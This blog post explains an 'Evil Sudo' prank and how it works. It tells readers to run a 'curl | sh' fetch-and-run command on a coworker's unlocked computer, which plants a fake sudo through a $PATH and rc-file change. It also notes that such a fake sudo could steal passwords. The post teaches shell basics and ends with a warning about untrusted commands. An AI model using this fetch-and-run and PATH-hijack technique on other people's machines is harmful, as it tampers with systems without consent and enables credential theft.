Evil Sudo

This article assumes basic knowledge of the command-line. It also assumes you are on Linux or Mac.

There is also a video to accompany this blog post if you prefer. youtube: RrgxRXZf0vI

Want to infuriate a coworker?

  1. Wait until they leave their computer unlocked.
  2. Open a terminal and run this command:
curl | sh
  1. Close the terminal.

Now, whenever they try to use sudo, they’ll see this:

10d20d7815 EXCEPTION unknown (0313)

Googling won’t help them, because that error is utter nonsense.

How does this work?

To understand what’s happening, you need to understand the following things:

  1. What curl is.
  2. How you can pipe text to a shell.
  3. What does, and how the shell (command-line) determines which programs to run.

What’s curl?

Curl takes a URL, makes an HTTP request, and returns the response right in the terminal. Curl can do a lot more than that, but for us, this is enough.

Type curl into your terminal. You should now see a wall of text. That text is the HTML of Google’s landing page.

Now type curl I promise nothing bad will happen. What you see now is a shell script I wrote and hosted online. Curl went out and got it for you.

Sending text to a shell.

The pipe command looks like a pipe: |. It takes the output of one command and sends it to another command.

Type sh into your terminal. You are now in an sh shell. It’s a lot like a Bash or Z shell. You can play around in this shell if you want. Then type exit to get back to your normal shell.

Type echo "echo hi" | sh into your terminal. This will send the text “echo hi” to the sh shell to be run. sh will run the command return the value, which is “hi”.

So, looking at the command from the start of this blog post, can you see what curl | sh does?

It takes the result of curl, which is a shell script, and sends it to sh. sh then runs the shell script.

So, running curl | sh downloads a shell script called and runs it on your computer as you.

What does do?

Here’s what DOESN’T do: it doesn’t modify your sudo command. It can’t do that, because it doesn’t have root access.

Unix-based systems have a $PATH variable. To see yours, type echo $PATH. This variable tells your shell where to find programs. Your shell looks, in order, through these directories to see if a program exists. When it finds a program, it runs it. adds a directory to your $PATH and then creates a fake sudo program in that directory. It does this by determining what shell you are using, and adding a line to your rc file. So far, it only supports bash and zsh, but that covers 95% of all users. Now, when you run the sudo command, your shell finds the fake sudo program first and uses the fake sudo instead of the real sudo.

Don’t worry though! is harmless.

This could be much worse is annoying, but it could be much worse. It could pretend to be the real sudo command, and steal your password. Once it has your password, it could delete all files on your computer. Scary.

Make sure you only run commands you trust!

Learn more

The source code and a command to remove are available here.